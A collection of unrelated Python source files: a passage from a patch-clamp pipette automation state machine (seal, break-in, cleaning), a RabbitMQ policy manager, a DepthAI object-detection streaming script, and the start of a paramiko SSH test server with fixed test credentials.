direction = np.array([0.0, 0.0, -1.0])
elif config['advanceMode'] == 'axial':
direction = pip.globalDirection()
elif config['advanceMode'] == 'target':
direction = target - pos
else:
raise ValueError("advanceMode must be 'vertical', 'axial', or 'target' (got %r)" % config['advanceMode'])
direction = direction / np.linalg.norm(direction)
endpoint = None
# max search distance
if config['maxAdvanceDistance'] is not None:
endpoint = pos + direction * config['maxAdvanceDistance']
# max surface depth
if config['maxAdvanceDepthBelowSurface'] is not None and direction[2] < 0:
endDepth = surface - config['maxAdvanceDepthBelowSurface']
dz = endDepth - pos[2]
depthEndpt = pos + direction * (dz / direction[2])
# is the surface depth endpoint closer?
if endpoint is None or np.linalg.norm(endpoint-pos) > np.linalg.norm(depthEndpt-pos):
endpoint = depthEndpt
# max distance past target
if config['advanceMode'] == 'target' and config['maxAdvanceDistancePastTarget'] is not None:
targetEndpt = target + direction * config['maxAdvanceDistancePastTarget']
# is the target endpoint closer?
if endpoint is None or np.linalg.norm(endpoint-pos) > np.linalg.norm(targetEndpt-pos):
endpoint = targetEndpt
if endpoint is None:
raise Exception("Cell detect state requires one of maxAdvanceDistance, maxAdvanceDepthBelowSurface, or maxAdvanceDistancePastTarget.")
return endpoint
def startContinuousMove(self):
"""Begin moving pipette continuously along search path.
"""
endpoint = self.getSearchEndpoint()
self.contAdvanceFuture = self.dev.pipetteDevice._moveToGlobal(endpoint, speed=self.config['advanceSpeed'])
def getAdvanceSteps(self):
"""Return the list of step positions to take along the search path.
"""
config = self.config
endpoint = self.getSearchEndpoint()
pos = np.array(self.dev.pipetteDevice.globalPosition())
diff = endpoint - pos
dist = np.linalg.norm(diff)
nSteps = int(dist / config['advanceStepDistance'])
step = diff * config['advanceStepDistance'] / dist
return pos[np.newaxis, :] + step[np.newaxis, :] * np.arange(nSteps)[:, np.newaxis]
def singleStep(self):
"""Advance a single step in the search path and block until the move has finished.
"""
config = self.config
dev = self.dev
stepPos = self.advanceSteps[self.stepCount]
self.stepCount += 1
fut = dev.pipetteDevice._moveToGlobal(stepPos, speed=config['advanceSpeed'])
self.waitFor(fut)
def cleanup(self):
if self.contAdvanceFuture is not None:
self.contAdvanceFuture.stop()
patchrec = self.dev.patchRecord()
patchrec['cellDetectFinalTarget'] = tuple(self.dev.pipetteDevice.targetPosition())
PatchPipetteState.cleanup(self)
class PatchPipetteSealState(PatchPipetteState):
"""Handles sealing onto cell
State name: "seal"
- monitor resistance to detect loose seal and GOhm seal
- set holding potential after loose seal
- modulate pressure to improve likelihood of forming seal
- cut pressure after GOhm and transition to cell attached
Parameters
----------
pressureMode : str
'auto' enables automatic pressure control during sealing;
'user' simply switches to user control for sealing.
startingPressure : float
Initial pressure (Pascals) to apply when beginning sealing in 'auto' mode.
holdingThreshold : float
Seal resistance (ohms) above which the holding potential will switch
from its initial value to the value specified in the *holdingPotential*
parameter.
holdingPotential : float
Holding potential (volts) to apply to the pipette after the seal resistance
becomes greater than *holdingThreshold*.
sealThreshold : float
Seal resistance (ohms) above which the pipette is considered sealed and
transitions to the 'cell attached' state.
breakInThreshold : float
Capacitance (Farads) above which the pipette is considered to be whole-cell and
transitions to the 'break in' state (in case of partial break-in, we don't want to transition
directly to 'whole cell' state).
nSlopeSamples : int
Number of consecutive test pulse measurements over which the rate of change
in seal resistance is measured (for automatic pressure control).
autoSealTimeout : float
Maximum timeout (seconds) before the seal attempt is aborted,
transitioning to *fallbackState*.
maxVacuum : float
The largest vacuum pressure (pascals, negative value) to apply during sealing.
When this pressure is reached, the pressure is reset to 0 and the ramp starts over after a delay.
pressureChangeRates : list
A list of (seal_resistance_threshold, pressure_change) tuples that determine how much to
change the current seal pressure based on the rate of change in seal resistance.
For each iteration, select the first tuple in the list where the current rate of
change in seal resistance is _less_ than the threshold specified in the tuple.
delayBeforePressure : float
Wait time (seconds) at beginning of seal state before applying negative pressure.
delayAfterSeal : float
Wait time (seconds) after GOhm seal is acquired, before transitioning to next state.
afterSealPressure : float
Pressure (Pascals) to apply during *delayAfterSeal* interval. This can help to stabilize the seal after initial formamtion.
resetDelay : float
Wait time (seconds) after maxVacuum is reached, before restarting pressure ramp.
"""
stateName = 'seal'
_defaultConfig = {
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'fallbackState': 'fouled',
'pressureMode': 'user', # 'auto' or 'user'
'startingPressure': -1000,
'holdingThreshold': 100e6,
'holdingPotential': -70e-3,
'sealThreshold': 1e9,
'breakInThreshold': 10e-12,
'nSlopeSamples': 5,
'autoSealTimeout': 30.0,
'maxVacuum': -3e3, #changed from -7e3
'pressureChangeRates': [(0.5e6, -100), (100e6, 0), (-1e6, 200)], #initially 1e6,150e6,None
'delayBeforePressure': 0.0,
'delayAfterSeal': 5.0,
'afterSealPressure': -1000,
'resetDelay': 5.0,
}
def initialize(self):
self.dev.clean = False
PatchPipetteState.initialize(self)
def run(self):
self.monitorTestPulse()
config = self.config
dev = self.dev
recentTestPulses = deque(maxlen=config['nSlopeSamples'])
while True:
initialTP = dev.lastTestPulse()
if initialTP is not None:
break
self._checkStop()
time.sleep(0.05)
initialResistance = initialTP.analysis()['steadyStateResistance']
patchrec = dev.patchRecord()
patchrec['resistanceBeforeSeal'] = initialResistance
patchrec['capacitanceBeforeSeal'] = initialTP.analysis()['capacitance']
startTime = ptime.time()
pressure = config['startingPressure']
mode = config['pressureMode']
self.setState('beginning seal (mode: %r)' % mode)
if mode == 'user':
dev.pressureDevice.setPressure(source='user', pressure=0)
elif mode == 'auto':
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
else:
raise ValueError("pressureMode must be 'auto' or 'user' (got %r')" % mode)
dev.setTipClean(False)
patchrec['attemptedSeal'] = True
holdingSet = False
while True:
self._checkStop()
# pull in all new test pulses (hopefully only one since the last time we checked)
tps = self.getTestPulses(timeout=0.2)
recentTestPulses.extend(tps)
if len(tps) == 0:
continue
tp = tps[-1]
ssr = tp.analysis()['steadyStateResistance']
cap = tp.analysis()['capacitance']
# if cap > config['breakInThreshold']:
# patchrec['spontaneousBreakin'] = True
# return 'break in'
patchrec['resistanceBeforeBreakin'] = ssr
patchrec['capacitanceBeforeBreakin'] = cap
if not holdingSet and ssr > config['holdingThreshold']:
self.setState('enable holding potential %0.1f mV' % (config['holdingPotential']*1000))
dev.clampDevice.setHolding(mode=None, value=config['holdingPotential'])
holdingSet = True
# seal detected?
if ssr > config['sealThreshold']:
# delay for a short period, possibly applying pressure to allow seal to stabilize
if config['delayAfterSeal'] > 0:
if config['afterSealPressure'] == 0:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
else:
dev.pressureDevice.setPressure(source='regulator', pressure=config['afterSealPressure'])
self.sleep(config['delayAfterSeal'])
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
self.setState('gigaohm seal detected')
dev.clampDevice.autoCapComp()
self._taskDone()
patchrec['sealSuccessful'] = True
return 'cell attached'
if mode == 'auto':
dt = ptime.time() - startTime
if dt < config['delayBeforePressure']:
# delay at atmospheric pressure before starting suction
continue
if dt > config['autoSealTimeout']:
patchrec['sealSuccessful'] = False
self._taskDone(interrupted=True, error="Seal failed after %f seconds" % dt)
return
# update pressure
res = np.array([tp.analysis()['steadyStateResistance'] for tp in recentTestPulses])
times = np.array([tp.startTime() for tp in recentTestPulses])
slope = scipy.stats.linregress(times, res).slope
pressure = np.clip(pressure, config['maxVacuum'], 0)
# decide how much to adjust pressure based on rate of change in seal resistance
for max_slope, change in config['pressureChangeRates']:
if max_slope is None or slope < max_slope:
pressure += change
break
# here, if the maxVacuum has been achieved and we are still sealing, cycle back to 0 and redo the pressure change
if pressure <= config['maxVacuum']:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
self.sleep(config['resetDelay'])
pressure = 0
dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
continue
self.setState('Rpip slope: %g MOhm/sec Pressure: %g Pa' % (slope/1e6, pressure))
dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
def cleanup(self):
self.dev.pressureDevice.setPressure(source='atmosphere')
PatchPipetteState.cleanup(self)
class PatchPipetteCellAttachedState(PatchPipetteState):
"""Pipette in cell-attached configuration
State name: "cell attached"
- automatically transition to 'break in' after a delay
- monitor for spontaneous break-in or loss of attached cell
Parameters
----------
autoBreakInDelay : float
Delay time (seconds) before transitioning to 'break in' state. If None, then never automatically
transition to break-in.
breakInThreshold : float
Capacitance (Farads) above which the pipette is considered to be whole-cell and immediately
transitions to the 'break in' state (in case of partial break-in, we don't want to transition
directly to 'whole cell' state).
holdingCurrentThreshold : float
Holding current (Amps) below which the cell is considered to be lost and the state fails.
spontaneousBreakInState:
Name of state to transition to when the membrane breaks in spontaneously. Default
is 'break in' so that partial break-ins will be completed. To disable, set to 'whole cell'.
"""
stateName = 'cell attached'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': -70e-3,
'initialTestPulseEnable': True,
'autoBreakInDelay': None,
'breakInThreshold': 10e-12,
'holdingCurrentThreshold': -1e-9,
'spontaneousBreakInState': 'break in',
}
def run(self):
self.monitorTestPulse()
patchrec = self.dev.patchRecord()
config = self.config
startTime = ptime.time()
delay = config['autoBreakInDelay']
while True:
if delay is not None and ptime.time() - startTime > delay:
return 'break in'
self._checkStop()
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0:
continue
tp = tps[-1]
holding = tp.analysis()['baselineCurrent']
if holding < self.config['holdingCurrentThreshold']:
self._taskDone(interrupted=True, error='Holding current exceeded threshold.')
return
cap = tp.analysis()['capacitance']
if cap > config['breakInThreshold']:
patchrec['spontaneousBreakin'] = True
return config['spontaneousBreakInState']
patchrec['resistanceBeforeBreakin'] = tp.analysis()['steadyStateResistance']
patchrec['capacitanceBeforeBreakin'] = cap
class PatchPipetteBreakInState(PatchPipetteState):
"""State using pressure pulses to rupture membrane for whole cell recording.
State name: "break in"
- applies a sequence of pressure pulses of increasing strength
- monitors for break-in
Parameters
----------
nPulses : list of int
Number of pressure pulses to apply on each break-in attempt
pulseDurations : list of float
Duration (seconds) of pulses to apply on each break in attempt
pulsePressures : list of float
Pressure (Pascals) of pulses to apply on each break in attempt
pulseInterval : float
Delay (seconds) between break in attempts
capacitanceThreshold : float
Capacitance (Farads) above which to transition to the 'whole cell' state
(note that resistance threshold must also be met)
resistanceThreshold : float
Resistance (Ohms) below which to transition to the 'whole cell' state if
capacitance threshold is met, or fail otherwise.
holdingCurrentThreshold : float
Holding current (Amps) below which the cell is considered to be lost and the state fails.
"""
stateName = 'break in'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': -70e-3,
'initialTestPulseEnable': True,
'nPulses': [1, 1, 1, 1, 1, 2, 2, 3, 3, 5],
'pulseDurations': [0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.3, 0.5, 0.7, 1.5],
'pulsePressures': [-30e3, -35e3, -40e3, -50e3, -60e3, -60e3, -60e3, -60e3, -60e3, -60e3],
'pulseInterval': 2,
'resistanceThreshold': 650e6,
'capacitanceThreshold': 10e-12,
'holdingCurrentThreshold': -1e-9,
'fallbackState': 'fouled',
}
def run(self):
patchrec = self.dev.patchRecord()
self.monitorTestPulse()
config = self.config
lastPulse = ptime.time()
attempt = 0
while True:
status = self.checkBreakIn()
if status is True:
patchrec['spontaneousBreakin'] = True
patchrec['breakinSuccessful'] = True
return 'whole cell'
elif status is False:
return
if ptime.time() - lastPulse > config['pulseInterval']:
nPulses = config['nPulses'][attempt]
pdur = config['pulseDurations'][attempt]
press = config['pulsePressures'][attempt]
self.setState('Break in attempt %d' % attempt)
status = self.attemptBreakIn(nPulses, pdur, press)
patchrec['attemptedBreakin'] = True
if status is True:
patchrec['breakinSuccessful'] = True
patchrec['spontaneousBreakin'] = False
return 'whole cell'
elif status is False:
patchrec['breakinSuccessful'] = False
return config['fallbackState']
lastPulse = ptime.time()
attempt += 1
if attempt >= len(config['nPulses']):
self._taskDone(interrupted=True, error='Breakin failed after %d attempts' % attempt)
patchrec['breakinSuccessful'] = False
return config['fallbackState']
def attemptBreakIn(self, nPulses, duration, pressure):
for i in range(nPulses):
# get the next test pulse
status = self.checkBreakIn()
if status is not None:
return status
self.dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
time.sleep(duration)
self.dev.pressureDevice.setPressure(source='atmosphere')
def checkBreakIn(self):
while True:
self._checkStop()
tps = self.getTestPulses(timeout=0.2)
if len(tps) > 0:
break
tp = tps[-1]
analysis = tp.analysis()
holding = analysis['baselineCurrent']
if holding < self.config['holdingCurrentThreshold']:
self._taskDone(interrupted=True, error='Holding current exceeded threshold.')
return False
# If ssr and cap cross threshold => successful break in
# If only ssr crosses threshold => lost cell
# If only cap crosses threshold => partial break in, keep trying
ssr = analysis['steadyStateResistance']
cap = analysis['capacitance']
if self.config['resistanceThreshold'] is not None and ssr < self.config['resistanceThreshold']:
return True
# if cap > self.config['capacitanceThreshold']:
# return True
# else:
# self._taskDone(interrupted=True, error="Resistance dropped below threshold but no cell detected.")
# return False
def cleanup(self):
dev = self.dev
try:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
except Exception:
printExc("Error resetting pressure after clean")
PatchPipetteState.cleanup(self)
class PatchPipetteResealState(PatchPipetteState):
stateName = 'reseal'
_defaultConfig = {
'fallbackState': 'whole cell',
}
def run(self):
# move to approach position + auto pipette offset
pass
class PatchPipetteBlowoutState(PatchPipetteState):
stateName = 'blowout'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'blowoutPressure': 65e3,
'blowoutDuration': 2.0,
'fallbackState': 'bath',
}
def run(self):
patchrec = self.dev.patchRecord()
self.monitorTestPulse()
config = self.config
fut = self.dev.pipetteDevice.retractFromSurface()
self.waitFor(fut)
self.dev.pressureDevice.setPressure(source='regulator', pressure=config['blowoutPressure'])
self.sleep(config['blowoutDuration'])
self.dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
# wait until we have a test pulse that ran after blowout was finished.
start = ptime.time()
while True:
self._checkStop()
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0 or tps[-1].startTime() < start:
continue
break
tp = tps[-1].analysis()
patchrec['resistanceAfterBlowout'] = tp['steadyStateResistance']
self.dev.finishPatchRecord()
return config['fallbackState']
def cleanup(self):
dev = self.dev
try:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
except Exception:
printExc("Error resetting pressure after blowout")
PatchPipetteState.cleanup(self)
class PatchPipetteCleanState(PatchPipetteState):
"""Pipette cleaning state.
Cycles +/- pressure in a "clean" bath followed by an optional "rinse" bath.
"""
stateName = 'clean'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': False,
'cleanSequence': [(-35e3, 1.0), (100e3, 1.0)] * 5,
'rinseSequence': [(-35e3, 3.0), (100e3, 10.0)],
'approachHeight': 5e-3,
'fallbackState': 'out',
'finishPatchRecord': True,
}
def __init__(self, *args, **kwds):
self.resetPos = None
self.lastApproachPos = None
PatchPipetteState.__init__(self, *args, **kwds)
def run(self):
self.monitorTestPulse()
config = self.config.copy()
dev = self.dev
self.setState('cleaning')
dev.pipetteDevice.retractFromSurface().wait()
for stage in ('clean', 'rinse'):
self._checkStop()
sequence = config[stage + 'Sequence']
if len(sequence) == 0:
continue
pos = dev.pipetteDevice.loadPosition(stage)
if pos is None:
raise Exception("Device %s does not have a stored %s position." % (dev.pipetteDevice.name(), stage))
self.gotoApproachPosition(pos)
# todo: if needed, we can check TP for capacitance changes here
# and stop moving as soon as the fluid is detected
self.waitFor([dev.pipetteDevice._moveToGlobal(pos, 'fast')])
for pressure, delay in sequence:
dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
self._checkStop(delay)
dev.pipetteRecord()['cleanCount'] += 1
dev.clean = True
self.resetPosition()
dev.newPatchAttempt()
return 'out'
def gotoApproachPosition(self, pos):
"""
"""
dev = self.dev
currentPos = dev.pipetteDevice.globalPosition()
# first move back in x and up in z, leaving y unchanged
approachPos1 = [pos[0], currentPos[1], pos[2] + self.config['approachHeight']]
fut = dev.pipetteDevice._moveToGlobal(approachPos1, 'fast')
self.waitFor(fut)
if self.resetPos is None:
self.resetPos = approachPos1
# now move y over the well
approachPos2 = [pos[0], pos[1], pos[2] + self.config['approachHeight']]
fut = dev.pipetteDevice._moveToGlobal(approachPos2, 'fast')
self.lastApproachPos = approachPos2
self.waitFor(fut)
def resetPosition(self):
if self.lastApproachPos is not None:
self.dev.pipetteDevice._moveToGlobal(self.lastApproachPos, 'fast').wait()
self.lastApproachPos = None
if self.resetPos is not None:
self.dev.pipetteDevice._moveToGlobal(self.resetPos, 'fast').wait()
self.resetPos = None
def cleanup(self):
dev = self.dev
try:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
except Exception:
printExc("Error resetting pressure after clean")
self.resetPosition()
PatchPipetteState.cleanup(self)
|
PolicyManager.py
|
import os
import pika
import json
import time
import logging as log
from threading import Thread
from db.Models import Policy
class PolicyManager():
def __init__(self):
self.reload_policies()
self.needs_reloading = False
def use_policy(self, data_collector_id):
try:
if self.needs_reloading:
self.reload_policies()
if self.active_dc_id != data_collector_id:
self.active_policy = self.policy[self.policy_by_dc[data_collector_id]]
self.active_dc_id = data_collector_id
except Exception as exc:
log.error(f"Error trying to change the active policy: {exc}")
def is_enabled(self, alert_type):
try:
for item in self.active_policy.items:
if item.alert_type_code == alert_type:
return item.enabled
return True
except Exception as exc:
log.error(f"Error on is_enabled for alert {alert_type}. Exception: {exc}")
return False
def get_parameters(self, alert_type):
try:
for item in self.active_policy.items:
if item.alert_type_code == alert_type:
default_parameters = json.loads(item.alert_type.parameters)
default_parameters = {par : val['default'] for par, val in default_parameters.items()}
parameters = json.loads(item.parameters)
parameters = {par : val for par, val in parameters.items()}
# Add missing default parameters and update the item if needed
needs_update = False
for par, val in default_parameters.items():
if par not in parameters:
needs_update = True
parameters[par] = val
if needs_update:
item.parameters = json.dumps(parameters)
item.db_update()
return parameters
# If no item found for this alert_type, add it with default parameters and return them
return self.active_policy.add_missing_item(alert_type)
except Exception as exc:
log.error(f"Error getting parameters of alert {alert_type}. Exception: {exc}")
return {}
def subscribe_to_events(self):
try:
def connect_to_mq():
time.sleep(2)
rabbit_credentials = pika.PlainCredentials(username = os.environ["RABBITMQ_DEFAULT_USER"],
password = os.environ["RABBITMQ_DEFAULT_PASS"])
rabbit_parameters = pika.ConnectionParameters(host = os.environ["RABBITMQ_HOST"],
port = os.environ["RABBITMQ_PORT"],
credentials = rabbit_credentials)
connection = pika.BlockingConnection(rabbit_parameters)
channel = connection.channel()
channel.exchange_declare(exchange='policies_events', exchange_type='fanout')
result = channel.queue_declare(queue='', exclusive=True)
queue_name = result.method.queue
channel.queue_bind(exchange='policies_events', queue=queue_name)
channel.basic_consume(on_message_callback=self._handle_events, queue=queue_name, auto_ack=True)
channel.start_consuming()
thread = Thread(target = connect_to_mq)
thread.setDaemon(True)
thread.start()
except Exception as exc:
log.error(f"Error: could not subscribe to policy events. Exception: {exc}")
def _handle_events(self, ch, method, properties, body):
self.needs_reloading = True
def reload_policies(self):
try:
self.policy = {p.id : p for p in Policy.find()}
self.policy_by_dc = {dc.id : p.id for p in self.policy.values() for dc in p.data_collectors}
self.active_dc_id = None
self.active_policy = None
self.needs_reloading = False
except Exception as exc:
log.error(f"Error reloading policies:\n{exc}")
|
main.py
|
import json
import socketserver
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from io import BytesIO
from pathlib import Path
import sys
from socketserver import ThreadingMixIn
from time import sleep
import depthai as dai
import numpy as np
import cv2
from PIL import Image
import blobconverter
HTTP_SERVER_PORT = 8090
class TCPServerRequest(socketserver.BaseRequestHandler):
def handle(self):
# Handle is called each time a client is connected
# When OpenDataCam connects, do not return - instead keep the connection open and keep streaming data
# First send HTTP header
header = 'HTTP/1.0 200 OK\r\nServer: Mozarella/2.2\r\nAccept-Range: bytes\r\nConnection: close\r\nMax-Age: 0\r\nExpires: 0\r\nCache-Control: no-cache, private\r\nPragma: no-cache\r\nContent-Type: application/json\r\n\r\n'
self.request.send(header.encode())
while True:
sleep(0.1)
if hasattr(self.server, 'datatosend'):
self.request.send(self.server.datatosend.encode() + "\r\n".encode())
# HTTPServer MJPEG
class VideoStreamHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=--jpgboundary')
self.end_headers()
while True:
sleep(0.1)
if hasattr(self.server, 'frametosend'):
image = Image.fromarray(cv2.cvtColor(self.server.frametosend, cv2.COLOR_BGR2RGB))
stream_file = BytesIO()
image.save(stream_file, 'JPEG')
self.wfile.write("--jpgboundary".encode())
self.send_header('Content-type', 'image/jpeg')
self.send_header('Content-length', str(stream_file.getbuffer().nbytes))
self.end_headers()
image.save(self.wfile, 'JPEG')
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
# start TCP data server
server_TCP = socketserver.TCPServer(('localhost', 8070), TCPServerRequest)
th = threading.Thread(target=server_TCP.serve_forever)
th.daemon = True
th.start()
# start MJPEG HTTP Server
server_HTTP = ThreadedHTTPServer(('localhost', HTTP_SERVER_PORT), VideoStreamHandler)
th2 = threading.Thread(target=server_HTTP.serve_forever)
th2.daemon = True
th2.start()
# MobilenetSSD label texts
labelMap = ["background", "aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow",
"diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train", "tvmonitor"]
syncNN = True
def create_pipeline(depth):
# Start defining a pipeline
pipeline = dai.Pipeline()
pipeline.setOpenVINOVersion(version=dai.OpenVINO.Version.VERSION_2021_2)
# Define a source - color camera
colorCam = pipeline.createColorCamera()
if depth:
mobilenet = pipeline.createMobileNetSpatialDetectionNetwork()
monoLeft = pipeline.createMonoCamera()
monoRight = pipeline.createMonoCamera()
stereo = pipeline.createStereoDepth()
else:
mobilenet = pipeline.createMobileNetDetectionNetwork()
colorCam.setPreviewSize(300, 300)
colorCam.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
colorCam.setInterleaved(False)
colorCam.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
mobilenet.setBlobPath(str(blobconverter.from_zoo("mobilenet-ssd", shaves=6, version="2021.2")))
mobilenet.setConfidenceThreshold(0.5)
mobilenet.input.setBlocking(False)
if depth:
monoLeft.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
monoLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)
monoRight.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
monoRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)
# Setting node configs
stereo.initialConfig.setConfidenceThreshold(255)
stereo.depth.link(mobilenet.inputDepth)
mobilenet.setBoundingBoxScaleFactor(0.5)
mobilenet.setDepthLowerThreshold(100)
mobilenet.setDepthUpperThreshold(5000)
monoLeft.out.link(stereo.left)
monoRight.out.link(stereo.right)
xoutRgb = pipeline.createXLinkOut()
xoutRgb.setStreamName("rgb")
colorCam.preview.link(mobilenet.input)
if syncNN:
mobilenet.passthrough.link(xoutRgb.input)
else:
colorCam.preview.link(xoutRgb.input)
xoutNN = pipeline.createXLinkOut()
xoutNN.setStreamName("detections")
mobilenet.out.link(xoutNN.input)
if depth:
xoutBoundingBoxDepthMapping = pipeline.createXLinkOut()
xoutBoundingBoxDepthMapping.setStreamName("boundingBoxDepthMapping")
mobilenet.boundingBoxMapping.link(xoutBoundingBoxDepthMapping.input)
xoutDepth = pipeline.createXLinkOut()
xoutDepth.setStreamName("depth")
mobilenet.passthroughDepth.link(xoutDepth.input)
return pipeline
# Pipeline is defined, now we can connect to the device
with dai.Device(dai.OpenVINO.Version.VERSION_2021_2) as device:
cams = device.getConnectedCameras()
depth_enabled = dai.CameraBoardSocket.LEFT in cams and dai.CameraBoardSocket.RIGHT in cams
# Start pipeline
device.startPipeline(create_pipeline(depth_enabled))
print(f"DepthAI is up & running. Navigate to 'localhost:{str(HTTP_SERVER_PORT)}' with Chrome to see the mjpeg stream")
# Output queues will be used to get the rgb frames and nn data from the outputs defined above
previewQueue = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
detectionNNQueue = device.getOutputQueue(name="detections", maxSize=4, blocking=False)
if depth_enabled:
xoutBoundingBoxDepthMapping = device.getOutputQueue(name="boundingBoxDepthMapping", maxSize=4, blocking=False)
depthQueue = device.getOutputQueue(name="depth", maxSize=4, blocking=False)
frame = None
detections = []
startTime = time.monotonic()
counter = 0
fps = 0
color = (255, 255, 255)
while True:
inPreview = previewQueue.get()
frame = inPreview.getCvFrame()
inNN = detectionNNQueue.get()
detections = inNN.detections
counter+=1
current_time = time.monotonic()
if (current_time - startTime) > 1 :
fps = counter / (current_time - startTime)
counter = 0
startTime = current_time
if depth_enabled:
depth = depthQueue.get()
depthFrame = depth.getFrame()
depthFrameColor = cv2.normalize(depthFrame, None, 255, 0, cv2.NORM_INF, cv2.CV_8UC1)
depthFrameColor = cv2.equalizeHist(depthFrameColor)
depthFrameColor = cv2.applyColorMap(depthFrameColor, cv2.COLORMAP_HOT)
if len(detections) != 0:
boundingBoxMapping = xoutBoundingBoxDepthMapping.get()
roiDatas = boundingBoxMapping.getConfigData()
for roiData in roiDatas:
roi = roiData.roi
roi = roi.denormalize(depthFrameColor.shape[1], depthFrameColor.shape[0])
topLeft = roi.topLeft()
bottomRight = roi.bottomRight()
xmin = int(topLeft.x)
ymin = int(topLeft.y)
xmax = int(bottomRight.x)
ymax = int(bottomRight.y)
cv2.rectangle(depthFrameColor, (xmin, ymin), (xmax, ymax), color, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX)
# If the frame is available, draw bounding boxes on it and show the frame
height = frame.shape[0]
width = frame.shape[1]
for detection in detections:
# Denormalize bounding box
x1 = int(detection.xmin * width)
x2 = int(detection.xmax * width)
y1 = int(detection.ymin * height)
y2 = int(detection.ymax * height)
try:
label = labelMap[detection.label]
except:
label = detection.label
cv2.putText(frame, str(label), (x1 + 10, y1 + 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.putText(frame, "{:.2f}".format(detection.confidence*100), (x1 + 10, y1 + 35), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
if depth_enabled:
cv2.putText(frame, f"X: {int(detection.spatialCoordinates.x)} mm", (x1 + 10, y1 + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.putText(frame, f"Y: {int(detection.spatialCoordinates.y)} mm", (x1 + 10, y1 + 65), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.putText(frame, f"Z: {int(detection.spatialCoordinates.z)} mm", (x1 + 10, y1 + 80), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.rectangle(frame, (x1, y1), (x2, y2), color, cv2.FONT_HERSHEY_SIMPLEX)
server_TCP.datatosend = str(label) + "," + f"{int(detection.confidence * 100)}%"
cv2.putText(frame, "NN fps: {:.2f}".format(fps), (2, frame.shape[0] - 4), cv2.FONT_HERSHEY_TRIPLEX, 0.4, color)
if depth_enabled:
new_width = int(depthFrameColor.shape[1] * (frame.shape[0] / depthFrameColor.shape[0]))
stacked = np.hstack([frame, cv2.resize(depthFrameColor, (new_width, frame.shape[0]))])
cv2.imshow("stacked", stacked)
server_HTTP.frametosend = stacked
else:
cv2.imshow("frame", frame)
server_HTTP.frametosend = frame
if cv2.waitKey(1) == ord('q'):
break
|
sshserver_p3.py
|
# -*- coding:utf-8 -*-
# 模块仅支持python3
import socket,paramiko,random
from binascii import hexlify
from paramiko.py3compat import u, decodebytes
# pip3 install tests utils
from tests.utils import make_tests_data_path
from gsiot.v3 import *
from gsiot.v3.net.server import Server as gsServer
# setup logging
paramiko.util.log_to_file(make_tests_data_path('sshserver.log'))
host_key = paramiko.RSAKey(filename=make_tests_data_path('test_rsa.key'))
# host_key = paramiko.DSSKey(filename='test_dss.key')
printf('Read key: ' + u(hexlify(host_key.get_fingerprint())))
banner = u'\r\n\u6b22\u8fce\r\n'
event_timeout = 5
class Server(paramiko.ServerInterface):
# 'data' is the output of base64.b64encode(key)
# (using the "user_rsa_key" files)
data = (b'AAAAB3NzaC1yc2EAAAABIwAAAIEAyO4it3fHlmGZWJaGrfeHOVY7RWO3P9M7hp'
b'fAu7jJ2d7eothvfeuoRFtJwhUmZDluRdFyhFY/hFAh76PJKGAusIqIQKlkJxMC'
b'KDqIexkgHAfID/6mqvmnSJf0b5W8v5h2pI/stOSwTQ+pxVhwJ9ctYDhRSlF0iT'
b'UWT10hcuO4Ks8=')
good_pub_key = paramiko.RSAKey(data=decodebytes(data))
encodings = ['UTF-8', 'GBK', 'UTF-8\r\n', 'GBK\r\n']
def __init__(self):
self.shell_event = threading.Event()
self.exec_event = threading.Event()
self.encoding = random.choice(self.encodings)
self.password_verified = False
self.key_verified = False
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
print('Auth attempt with username: {!r} & password: {!r}'.format(username, password)) # noqa
if (username in ['robey', 'bar', 'foo']) and (password == 'foo'):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
def check_auth_publickey(self, username, key):
print('Auth attempt with username: {!r} & key: {!r}'.format(username, u(hexlify(key.get_fingerprint())))) # noqa
if (username in ['robey', 'keyonly']) and (key == self.good_pub_key):
return paramiko.AUTH_SUCCESSFUL
